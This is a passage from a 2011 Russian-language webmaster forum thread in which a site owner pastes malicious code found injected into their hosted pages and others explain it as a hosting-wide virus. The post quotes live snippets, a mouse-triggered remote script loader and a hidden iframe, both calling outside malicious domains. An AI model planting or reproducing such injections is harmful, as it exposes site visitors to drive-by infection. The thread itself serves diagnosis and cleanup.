document.write('<scr'+'ipt src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js"></sc r'+'ipt>');var x = jQuery.noConflict(true);x(function() {var flag = 0;x(window).mousemove(function() {if (flag === 0) {flag = 1;x.getScript('http://firefoxstabs.com/' + Math.random().toString().substring(3) + '.js', function() {flag = 2;});}});});
такого содержания:
<div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><div style="visibility:hidden"></div><!-- o65 --><script>
var object = document.createElement('if'+'ra'+'me');
object.setAttribute('style', 'visibility: hidden');
object.setAttribute('height', '2');
object.setAttribute('src', 'http://ya-toptal-tvoyu-dushu.com/domains/01');
document.body.appendChild(object);
</script> <!-- c65 -->
и еще два куска побольше.
Что это может быть за уязвимость? Терпение для подчистки на нуле.
Спустя 5 минут, 26 секунд (18.05.2011 - 07:45) Michael написал(а):
и куда внедряют? Что значит в скрипты? Может в данные?
Спустя 9 минут, 8 секунд (18.05.2011 - 07:55) user321 написал(а):
В страницы.
В подключаемые блоки php-кода.
В ява-скрипты начиная с Jquery (везде в конец, без удаления каких-либо данных), заканчивая самописными.
В подключаемые блоки php-кода.
В ява-скрипты начиная с Jquery (везде в конец, без удаления каких-либо данных), заканчивая самописными.
Спустя 38 минут, 20 секунд (18.05.2011 - 08:33) linker написал(а):
Это у тебя вири на компе.
Спустя 48 минут, 21 секунда (18.05.2011 - 09:21) inpost написал(а):
user321
Да часть хостингов пало, прошлась эпидемия этого вируса.
Некоторые сервера автоматичеки бекапнулись, часть сайтов приходится вручную лечить. У меня вирус заразил всего 3 сайта, один из которых сервер бекапнули и востановили хостеры. 2 других - вручную пришлось заливать заново.
Если же на компе такое, значит вирус попал именно к тебе на комп. Прогани антивирусом, а потом почисти в конце файлов эти записи. Он заражает файлы с именами index, default, и другими похожими.
Да часть хостингов пало, прошлась эпидемия этого вируса.
Некоторые сервера автоматичеки бекапнулись, часть сайтов приходится вручную лечить. У меня вирус заразил всего 3 сайта, один из которых сервер бекапнули и востановили хостеры. 2 других - вручную пришлось заливать заново.
Если же на компе такое, значит вирус попал именно к тебе на комп. Прогани антивирусом, а потом почисти в конце файлов эти записи. Он заражает файлы с именами index, default, и другими похожими.
Спустя 1 час, 4 минуты, 56 секунд (18.05.2011 - 10:26) user321 написал(а):
Не на компе (не на локальном хосте) такое, у хостера.
Уже легче. Спасибо за информацию.
Думал на сайте брешь.
Уже легче. Спасибо за информацию.
Думал на сайте брешь.
Спустя 2 часа, 8 минут, 37 секунд (18.05.2011 - 12:35) Nikitian написал(а):
Офигеть вирусоделы обленились! Даже свои поделки делают на основе jquery (: